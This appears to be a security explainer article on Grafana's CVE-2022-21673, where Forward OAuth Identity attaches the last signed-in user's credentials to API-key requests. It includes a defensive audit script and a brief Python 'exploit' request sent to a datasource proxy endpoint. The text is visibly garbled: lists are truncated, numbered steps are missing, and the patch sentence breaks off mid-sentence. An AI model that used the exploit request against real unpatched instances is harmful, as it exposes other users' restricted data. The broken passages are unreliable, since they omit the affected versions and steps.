Grafana is a leading open-source platform, popular for monitoring and observability, powering dashboards used by engineers and companies worldwide. In early 2022, a serious vulnerability (CVE-2022-21673) was discovered, potentially letting attackers access data they should not be able to see. This article explains how this bug worked, why it was dangerous, and what you need to do about it—using simple language and exclusive analysis.
What Is CVE-2022-21673?
The vulnerability revolves around Grafana's Forward OAuth Identity feature. This option, when enabled, forwards the OAuth identity of a logged-in user when certain data sources make their own queries. This is neat for Single Sign-On setups with strict permissions.
BUT—in affected versions, this system could be tricked by someone with only an API key. They could send a query without user credentials. Instead of being denied, the system would send the request with the identity of the most recent logged-in user. This means API key holders could access data intended for *someone else*.
The exposure depends on a few conditions, including:

- API keys are being used by users to access Grafana

If any of these do not apply, your Grafana instance probably isn't vulnerable.
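As an added defender-side check (not code from the original article or from the Grafana project), the script below audits the two conditions named above: data sources with Forward OAuth Identity switched on, which appears in the `GET /api/datasources` response as `jsonData.oauthPassThru`, and API keys in use, listed by `GET /api/auth/keys`. The sample responses are constructed; the live-fetch helper assumes a base URL and an admin-level token that you supply.

```python
import json
from typing import Any

# Constructed sample of what GET /api/datasources returns, abridged to the
# fields this check needs. "oauthPassThru" is the jsonData key behind the
# "Forward OAuth Identity" toggle in the data source settings.
SAMPLE_DATASOURCES = json.dumps([
    {"id": 1, "name": "prometheus-prod", "type": "prometheus",
     "jsonData": {"httpMethod": "POST", "oauthPassThru": True}},
    {"id": 2, "name": "loki-dev", "type": "loki",
     "jsonData": {"maxLines": 1000}},
    {"id": 3, "name": "payroll-postgres", "type": "postgres",
     "jsonData": {"sslmode": "disable", "oauthPassThru": True}},
])


def forward_oauth_datasources(datasources: list[dict[str, Any]]) -> list[str]:
    """Return the names of data sources that forward the caller's OAuth identity."""
    flagged = []
    for ds in datasources:
        json_data = ds.get("jsonData") or {}
        if json_data.get("oauthPassThru") is True:
            flagged.append(ds["name"])
    return sorted(flagged)


def audit(datasources_json: str, api_keys: list[dict[str, Any]]) -> dict[str, Any]:
    """Combine both conditions: Forward OAuth Identity on at least one data source
    and at least one API key in use. Both present means the instance's version
    should be checked against the advisory before anyone relies on it."""
    flagged = forward_oauth_datasources(json.loads(datasources_json))
    return {
        "forward_oauth_datasources": flagged,
        "api_keys_in_use": len(api_keys) > 0,
        "review_needed": bool(flagged) and len(api_keys) > 0,
    }


def fetch_json(base_url: str, path: str, token: str) -> Any:
    """Live fetch helper (base_url and token are assumed operator inputs).
    Both endpoints need an admin-level token; use /api/datasources and /api/auth/keys."""
    import requests  # only needed for live use, not for the offline sample
    resp = requests.get(f"{base_url}{path}",
                        headers={"Authorization": f"Bearer {token}"}, timeout=10)
    resp.raise_for_status()
    return resp.json()


if __name__ == "__main__":
    # Constructed sample of GET /api/auth/keys: one active key exists.
    sample_keys = [{"id": 7, "name": "ci-reporter", "role": "Viewer"}]
    print(json.dumps(audit(SAMPLE_DATASOURCES, sample_keys), indent=2))
```

For a live run, pass `fetch_json(url, "/api/datasources", token)` (re-serialised with `json.dumps`) and `fetch_json(url, "/api/auth/keys", token)` into `audit`.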
How the Exploit Works
Imagine you’re a developer given API access to some dashboards, but not to payroll dashboards. In a vulnerable system, if "Forward OAuth Identity" is switched on, your API requests could be tagged with the identity of the last signed-in admin—even if your API token isn't supposed to see what their account can.
The data source is configured with Forward OAuth Identity ON.
4. Grafana mistakenly uses the OAuth credentials from the last web user session and forwards those with the API request.
Example Code: Exploiting CVE-2022-21673
Suppose you have an API key with limited dashboard access.
```python
import requests

# Replace with your Grafana endpoint and API key
GRAFANA_URL = "https://your-grafana.example.com/api/datasources/proxy/1/query"
API_KEY = "Bearer eyJrIjoib2..."

headers = {
    "Authorization": API_KEY,
    "Content-Type": "application/json",
}

# Query intended for a restricted datasource
data = {
    "queries": [
        {
            "refId": "A",
            "expr": "up",  # Prometheus query example
        }
    ]
}

response = requests.post(GRAFANA_URL, headers=headers, json=data)
print(response.status_code)
print(response.text)
```
If the *Forward OAuth Identity* misroute occurs, you'll see a response as if *an entirely different, more privileged user* had made that request, potentially exposing sensitive data. A holder of such a key could:

- Enumerate dashboards and datasets far beyond their allowed range

This could violate internal policies, break regulatory compliance, or even expose secrets to competitors or the public.
Grafana developers patched this vulnerability in
Final Thoughts
*Simple configuration choices* can have big consequences. CVE-2022-21673 is a great reminder: features like Forward OAuth Identity should be enabled with care, and all access paths—API, OAuth, dashboards—should be well understood. Stay patched and stay secure.
*Stay safe, and always double check your dashboard configuration!*
Timeline
Published on: 01/18/2022 22:15:00 UTC
Last modified on: 05/14/2022 03:16:00 UTC